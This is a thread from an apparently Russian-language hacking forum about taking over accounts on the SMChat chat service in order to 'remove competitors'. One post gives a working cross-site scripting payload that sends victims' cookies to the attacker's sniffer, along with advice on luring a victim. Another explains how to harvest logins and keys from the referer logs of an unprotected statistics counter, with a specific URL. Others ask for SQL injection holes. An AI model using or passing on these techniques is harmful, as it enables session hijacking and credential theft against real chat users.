аа.... это всё легко, типа снифа, я этим уже пользовался....... понятно спасибо.... Если честно я думал есть ли чё получше...
Кстати видел один раз одну фигню, ко мне человек зашёл с ником kill-admin а на снифе чёт типа того : IP: 194.85.136.6 QUERY: hotlog=1 REFERER: -=ты ребёнок а не хакер=- AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727) как мона обойти этот или чтоб тоже высветилось на чужом снифе чёнить такое
Снова поднимается старый вопрос по взлому СМЧАТа! Никто не смог найти чтонить по взлому? Нужно убрать конкурентов,а как не в курсе((( Помогите плиз!
Обсуждалось уже. Создаёш свой чат. В поле объявления пишешь конструкцию: <script>img=new Image(); img.src="Your sniffer;"+document.cookie;</script> Зовёшь жертву "заценить" ваш чат. Всё. Ждёшь печенюшек.
Если знаешь, так что мозги насчёт взлома парить. Пользуйся. Поищу сегодня ксс, может найду что хорошее.
Не парьтеся народ =) сча буду выдавать секреты ... тоесть элементарные истины -) мя дажэ пытать ненужно ... Слушайте и удивляйтесь =)) : Мучал я смчаты довольно долго ну и вот однажды ф пияном угаре набрёл я на сайтик proext.com - это щётчики еси хто не в курсе ... и вдруг вспомнил , что на см целый ворох этих щётчикоф ... руки зачасались , во рту пересохло ... Судорожно начал капать по щётчикам смчата ... один, второй везде пассы на статистике , а вот на proext.com нет пасса ... тоесть заходим на http://top.proext.com/stat/?id=10930&mode=page&page=1 и начинаем мля искать рефереры с кеями и логинами... фсё ! Кому что то не нравица идёт нах, спасибо. З.Ы. Кто найдёт сикуэл инжэк зареспекчу по самое небалуйся
Хуясё, на этом счётчике палются только те кто пользуются такими кнопками как : [TOP SMChat.Ru] [покинуть чат] или которых удаляют из чата и то не всегда и вообще способ старый .
Старый или новый разницы нет, он зато работает ... Проще заставить юзверя нажать [TOP SMChat.Ru], чем зайти на твою ссылку или чат -)